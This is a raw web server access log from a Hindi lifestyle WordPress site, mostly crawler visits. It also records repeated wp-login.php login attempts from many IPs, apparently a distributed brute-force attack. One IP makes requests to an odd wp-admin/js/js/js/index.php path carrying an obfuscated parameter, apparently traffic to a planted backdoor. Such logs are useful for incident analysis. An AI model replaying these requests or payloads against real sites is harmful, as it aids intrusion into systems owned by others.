66.116.199.115 - - [20/Oct/2025:08:35:21 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373332312p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936333732312q6166633735326536316262653765333538383930613537373036616231373632222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.244.66.235 - - [20/Oct/2025:08:37:46 -0400] "GET /tag/shashi-kapoor-daughter/ HTTP/2.0" 200 150272 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
2a03:2880:f800:17:: - - [20/Oct/2025:08:37:50 -0400] "GET /beauty-tricks-after-having-oversleep/%e0%a4%b8%e0%a5%81%e0%a4%ac%e0%a4%b9-%e0%a4%95%e0%a5%80-%e0%a4%97%e0%a4%b9%e0%a4%b0%e0%a5%80-%e0%a4%94%e0%a4%b0-%e0%a4%85%e0%a4%9a%e0%a5%8d%e0%a4%9b%e0%a5%80/ HTTP/2.0" 200 151823 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
35.77.213.191 - - [20/Oct/2025:08:37:51 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
35.77.213.191 - - [20/Oct/2025:08:37:53 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
88.99.162.239 - - [20/Oct/2025:08:37:54 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:37:54 -0400] "GET /tag/signs-pathological-liar/ HTTP/2.0" 200 149845 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
185.191.171.7 - - [20/Oct/2025:08:37:55 -0400] "GET /tag/facial-hair-removal-homemade-tips/ HTTP/2.0" 200 149482 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
88.99.162.239 - - [20/Oct/2025:08:38:01 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.249.73.67 - - [20/Oct/2025:08:38:00 -0400] "GET /113914001?entity=0113757166 HTTP/2.0" 200 189010 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.96.208 - - [20/Oct/2025:08:38:01 -0400] "GET /tag/essay-on-jewellery/ HTTP/2.0" 200 149794 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
57.130.20.252 - - [20/Oct/2025:08:38:03 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:38:02 -0400] "GET /tag/sleeping-with-pillow-is-bad/ HTTP/2.0" 200 149374 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
57.130.20.252 - - [20/Oct/2025:08:38:04 -0400] "POST /wp-login.php HTTP/2.0" 200 7090 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
89.117.74.114 - - [20/Oct/2025:08:38:06 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:35:43 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373334332p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936333734332q3632663861623535326138386136643835306137626632363262623463663266222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
85.208.96.198 - - [20/Oct/2025:08:38:08 -0400] "GET /tag/how-to-lose-weight-naturally-at-home-remedy/ HTTP/2.0" 200 149804 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.235 - - [20/Oct/2025:08:38:10 -0400] "GET /tag/smart-goals-examples-for-health/ HTTP/2.0" 200 149897 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
89.117.74.114 - - [20/Oct/2025:08:38:12 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.249.73.67 - - [20/Oct/2025:08:38:15 -0400] "GET /43914986?entity=0043854970 HTTP/2.0" 200 192021 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.158.12.68 - - [20/Oct/2025:08:38:19 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:38:18 -0400] "GET /tag/sonam-kapoor-beauty-tips-and-fitness-secrets/ HTTP/2.0" 200 149644 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
124.158.12.68 - - [20/Oct/2025:08:38:20 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
62.171.139.181 - - [20/Oct/2025:08:38:27 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:38:27 -0400] "GET /tag/spicy-potato-wedges-recipe/ HTTP/2.0" 200 149673 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
62.171.139.181 - - [20/Oct/2025:08:38:28 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.33.250.130 - - [20/Oct/2025:08:38:34 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.33.250.130 - - [20/Oct/2025:08:38:34 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:38:34 -0400] "GET /tag/stop-sweat-stains/ HTTP/2.0" 200 149557 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
185.244.36.159 - - [20/Oct/2025:08:38:36 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:36:05 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373336352p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936333736352q3235653164366537666535373630316463353130643066353465316335383536222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
185.244.36.159 - - [20/Oct/2025:08:38:37 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
51.38.53.154 - - [20/Oct/2025:08:38:39 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
51.38.53.154 - - [20/Oct/2025:08:38:40 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
152.53.42.70 - - [20/Oct/2025:08:38:43 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
152.53.42.70 - - [20/Oct/2025:08:38:44 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:38:43 -0400] "GET /tag/suji-maida-mathri/ HTTP/2.0" 200 149581 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
37.60.254.254 - - [20/Oct/2025:08:38:45 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
37.60.254.254 - - [20/Oct/2025:08:38:46 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
220.158.233.124 - - [20/Oct/2025:08:38:47 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:38:51 -0400] "GET /tag/surgery-for-urinary-incontinence/ HTTP/2.0" 200 149880 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
66.116.199.115 - - [20/Oct/2025:08:36:32 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373339322p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936333739322q3433626238356136323262376661316334363838393466323038613961393832222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
51.38.53.154 - - [20/Oct/2025:08:39:00 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:38:59 -0400] "GET /tag/surprising-benefits-of-onions/ HTTP/2.0" 200 149586 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
220.158.233.124 - - [20/Oct/2025:08:39:01 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
51.38.53.154 - - [20/Oct/2025:08:39:02 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.63.40.42 - - [20/Oct/2025:08:39:06 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.63.40.42 - - [20/Oct/2025:08:39:07 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
85.208.96.207 - - [20/Oct/2025:08:39:06 -0400] "GET /tag/all-white-outfits-for-all-white-party/ HTTP/2.0" 200 149755 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.235 - - [20/Oct/2025:08:39:08 -0400] "GET /tag/symptoms-of-heart-cancer-articles/ HTTP/2.0" 200 149672 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
35.200.179.113 - - [20/Oct/2025:08:39:18 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:39:17 -0400] "GET /tag/take-precautions-to-get-beautiful-skin/ HTTP/2.0" 200 149883 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
66.116.199.115 - - [20/Oct/2025:08:36:54 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373431342p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936333831342q3031366632356666643962316631363139383535316234346338373538643235222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
35.200.179.113 - - [20/Oct/2025:08:39:23 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
185.191.171.17 - - [20/Oct/2025:08:39:21 -0400] "GET /tag/egg-yolk/ HTTP/2.0" 200 149739 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
2a03:2880:f800:11:: - - [20/Oct/2025:08:39:22 -0400] "GET /tag/care-of-old-person/ HTTP/2.0" 200 149598 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
180.93.137.9 - - [20/Oct/2025:08:39:27 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:39:27 -0400] "GET /tag/teeth-shining-cream/ HTTP/2.0" 200 149854 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
51.38.53.154 - - [20/Oct/2025:08:39:32 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MDDRJS; rv:11.0) like Gecko"
180.93.137.9 - - [20/Oct/2025:08:39:34 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:39:35 -0400] "GET /tag/things-to-do-in-warm-weather/ HTTP/2.0" 200 149565 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
118.179.200.50 - - [20/Oct/2025:08:39:39 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.33.109.193 - - [20/Oct/2025:08:39:40 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
118.179.200.50 - - [20/Oct/2025:08:39:41 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
51.38.53.154 - - [20/Oct/2025:08:39:43 -0400] "POST /wp-login.php HTTP/2.0" 200 7145 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MDDRJS; rv:11.0) like Gecko"
178.33.109.193 - - [20/Oct/2025:08:39:43 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:37:16 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373433362p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936333833362q3335633039646337623765613661336161366463663439653964376236306237222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
51.38.53.154 - - [20/Oct/2025:08:39:44 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:39:43 -0400] "GET /tag/tips-for-glowing-nails/ HTTP/2.0" 200 149726 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
51.38.53.154 - - [20/Oct/2025:08:39:44 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
185.244.36.159 - - [20/Oct/2025:08:39:52 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:39:53 -0400] "GET /tag/tips-for-hand-and-foot-care/ HTTP/2.0" 200 149478 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
185.244.36.159 - - [20/Oct/2025:08:39:55 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
50.116.86.65 - - [20/Oct/2025:08:39:58 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
64.38.145.230 - - [20/Oct/2025:08:39:59 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
50.116.86.65 - - [20/Oct/2025:08:39:59 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
64.38.145.230 - - [20/Oct/2025:08:40:01 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
51.38.53.154 - - [20/Oct/2025:08:40:02 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
51.38.53.154 - - [20/Oct/2025:08:40:03 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
185.191.171.14 - - [20/Oct/2025:08:40:03 -0400] "GET /tag/how-to-get-glowing-and-strong-teeth/ HTTP/2.0" 200 149754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.235 - - [20/Oct/2025:08:40:04 -0400] "GET /tag/tips-for-healthy-lifestyle-in-hindi/ HTTP/2.0" 200 149610 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
66.116.199.115 - - [20/Oct/2025:08:37:39 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373435392p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936333835392q3065613533623737663037336432373035346633323832333762383832343632222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
50.21.186.206 - - [20/Oct/2025:08:40:08 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
50.21.186.206 - - [20/Oct/2025:08:40:09 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
139.59.60.172 - - [20/Oct/2025:08:40:13 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:40:13 -0400] "GET /tag/tips-for-making-your-wife-feel-loved/ HTTP/2.0" 200 149667 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
139.59.60.172 - - [20/Oct/2025:08:40:15 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
89.117.74.114 - - [20/Oct/2025:08:40:19 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
89.117.74.114 - - [20/Oct/2025:08:40:21 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.249.73.67 - - [20/Oct/2025:08:40:20 -0400] "GET /1717528140?entity=1715153306 HTTP/2.0" 200 192042 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.235 - - [20/Oct/2025:08:40:23 -0400] "GET /tag/today-festival-hindu/ HTTP/2.0" 200 149723 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
66.116.199.115 - - [20/Oct/2025:08:38:01 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373438312p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936333838312q3863313334656337616331373636343731353433343261613164366666626131222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
89.252.164.140 - - [20/Oct/2025:08:40:29 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:40:32 -0400] "GET /tag/turn-the-brush/ HTTP/2.0" 200 149597 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
37.24.161.119 - - [20/Oct/2025:08:40:35 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
89.252.164.140 - - [20/Oct/2025:08:40:35 -0400] "POST /wp-login.php HTTP/2.0" 200 7089 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
37.24.161.119 - - [20/Oct/2025:08:40:35 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
103.231.202.90 - - [20/Oct/2025:08:40:38 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
